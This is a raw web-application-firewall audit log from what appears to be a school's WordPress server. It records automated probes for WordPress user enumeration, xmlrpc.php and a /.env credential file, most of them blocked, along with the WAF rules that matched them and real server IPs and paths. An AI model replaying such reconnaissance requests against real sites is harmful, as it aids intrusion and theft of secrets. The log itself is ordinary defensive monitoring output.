smkn22-jkt.sch.id X-Real-IP: 156.249.60.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f08c8519-C-- demo.sayHello --f08c8519-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f08c8519-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746871756081542 6473 (- - -) Stopwatch2: 1746871756081542 6473; combined=4966, p1=653, p2=4096, p3=35, p4=39, p5=84, sr=116, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f08c8519-Z-- --afe91722-A-- [10/May/2025:17:14:39 +0700] aB8nD6uC4AqLGUOyzyU1TgAAAII 103.236.140.4 46428 103.236.140.4 8181 --afe91722-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --afe91722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afe91722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746872079283391 2810 (- - -) Stopwatch2: 1746872079283391 2810; combined=1485, p1=515, p2=938, p3=0, p4=0, p5=32, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afe91722-Z-- --0e345b3e-A-- [10/May/2025:17:14:42 +0700] aB8nEquC4AqLGUOyzyU1VQAAAIA 103.236.140.4 46488 103.236.140.4 8181 --0e345b3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e345b3e-C-- demo.sayHello --0e345b3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e345b3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746872082282941 5646 (- - -) Stopwatch2: 1746872082282941 5646; combined=4199, p1=561, p2=3390, p3=31, p4=37, p5=105, sr=85, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e345b3e-Z-- --6f7c4071-A-- [10/May/2025:17:20:24 +0700] aB8oaNr9PbfRBMhzxmSgcQAAAEI 103.236.140.4 53566 103.236.140.4 8181 --6f7c4071-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f7c4071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f7c4071-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746872424305000 2206 (- - -) Stopwatch2: 1746872424305000 2206; combined=1203, p1=399, p2=775, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f7c4071-Z-- --1d02781e-A-- [10/May/2025:17:20:29 +0700] aB8obci6w7GTj2w44Z7i8wAAAMU 103.236.140.4 53670 103.236.140.4 8181 --1d02781e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1d02781e-C-- demo.sayHello --1d02781e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d02781e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746872429035475 5817 (- - -) Stopwatch2: 1746872429035475 5817; combined=4331, p1=535, p2=3571, p3=32, p4=34, p5=94, sr=71, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d02781e-Z-- --e7262f24-A-- [10/May/2025:17:34:44 +0700] aB8rxMi6w7GTj2w44Z7mIAAAAM8 103.236.140.4 35810 103.236.140.4 8181 --e7262f24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.164.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.164.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e7262f24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7262f24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746873284248938 716 (- - -) Stopwatch2: 1746873284248938 716; combined=293, p1=257, p2=0, p3=0, p4=0, p5=35, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7262f24-Z-- --1756d96b-A-- [10/May/2025:17:34:56 +0700] aB8r0Mi6w7GTj2w44Z7mLwAAANY 103.236.140.4 35840 103.236.140.4 8181 --1756d96b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1756d96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1756d96b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873296363169 2158 (- - -) Stopwatch2: 1746873296363169 2158; combined=1149, p1=377, p2=743, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1756d96b-Z-- --b01d646a-A-- [10/May/2025:17:35:05 +0700] aB8r2ci6w7GTj2w44Z7mPAAAAMg 103.236.140.4 35866 103.236.140.4 8181 --b01d646a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b01d646a-C-- demo.sayHello --b01d646a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b01d646a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873305090577 5553 (- - -) Stopwatch2: 1746873305090577 5553; combined=4230, p1=545, p2=3454, p3=32, p4=38, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b01d646a-Z-- --97efac78-A-- [10/May/2025:17:35:23 +0700] aB8r68i6w7GTj2w44Z7mUwAAAMU 103.236.140.4 35912 103.236.140.4 8181 --97efac78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97efac78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97efac78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873323399400 2268 (- - -) Stopwatch2: 1746873323399400 2268; combined=1181, p1=393, p2=759, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97efac78-Z-- --bbc58e66-A-- [10/May/2025:17:35:33 +0700] aB8r9ci6w7GTj2w44Z7mawAAAMg 103.236.140.4 35962 103.236.140.4 8181 --bbc58e66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbc58e66-C-- demo.sayHello --bbc58e66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbc58e66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873333694457 5147 (- - -) Stopwatch2: 1746873333694457 5147; combined=4179, p1=485, p2=3405, p3=30, p4=33, p5=127, sr=75, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbc58e66-Z-- --b8a5e76c-A-- [10/May/2025:17:36:28 +0700] aB8sLMi6w7GTj2w44Z7mrgAAAMY 103.236.140.4 36108 103.236.140.4 8181 --b8a5e76c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b8a5e76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a5e76c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873388910689 2220 (- - -) Stopwatch2: 1746873388910689 2220; combined=1254, p1=390, p2=834, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a5e76c-Z-- --31ea5a7f-A-- [10/May/2025:17:36:44 +0700] aB8sPMi6w7GTj2w44Z7msAAAAMU 103.236.140.4 36112 103.236.140.4 8181 --31ea5a7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31ea5a7f-C-- demo.sayHello --31ea5a7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31ea5a7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873404490244 4468 (- - -) Stopwatch2: 1746873404490244 4468; combined=3473, p1=433, p2=2847, p3=22, p4=23, p5=87, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31ea5a7f-Z-- --951b9d3b-A-- [10/May/2025:17:36:50 +0700] aB8sQtr9PbfRBMhzxmSioQAAAEQ 103.236.140.4 36116 103.236.140.4 8181 --951b9d3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --951b9d3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --951b9d3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873410184812 2262 (- - -) Stopwatch2: 1746873410184812 2262; combined=1068, p1=387, p2=649, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --951b9d3b-Z-- --8d36b44c-A-- [10/May/2025:17:36:57 +0700] aB8sSauC4AqLGUOyzyU51AAAAIo 103.236.140.4 36120 103.236.140.4 8181 --8d36b44c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8d36b44c-C-- demo.sayHello --8d36b44c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d36b44c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873417690583 4473 (- - -) Stopwatch2: 1746873417690583 4473; combined=3523, p1=426, p2=2896, p3=25, p4=25, p5=88, sr=66, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d36b44c-Z-- --2d2a5669-A-- [10/May/2025:17:37:02 +0700] aB8sThLuBiaF9R054QCrkwAAAAE 103.236.140.4 36124 103.236.140.4 8181 --2d2a5669-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2d2a5669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d2a5669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873422228005 2760 (- - -) Stopwatch2: 1746873422228005 2760; combined=1307, p1=432, p2=849, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2a5669-Z-- --5cc9a042-A-- [10/May/2025:17:37:09 +0700] aB8sVauC4AqLGUOyzyU51QAAAIg 103.236.140.4 36128 103.236.140.4 8181 --5cc9a042-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cc9a042-C-- demo.sayHello --5cc9a042-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cc9a042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873429021224 5897 (- - -) Stopwatch2: 1746873429021224 5897; combined=4250, p1=527, p2=3489, p3=31, p4=35, p5=99, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cc9a042-Z-- --f232930b-A-- [10/May/2025:17:37:25 +0700] aB8sZauC4AqLGUOyzyU51wAAAI4 103.236.140.4 36132 103.236.140.4 8181 --f232930b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f232930b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f232930b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873445657721 2128 (- - -) Stopwatch2: 1746873445657721 2128; combined=1039, p1=334, p2=678, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
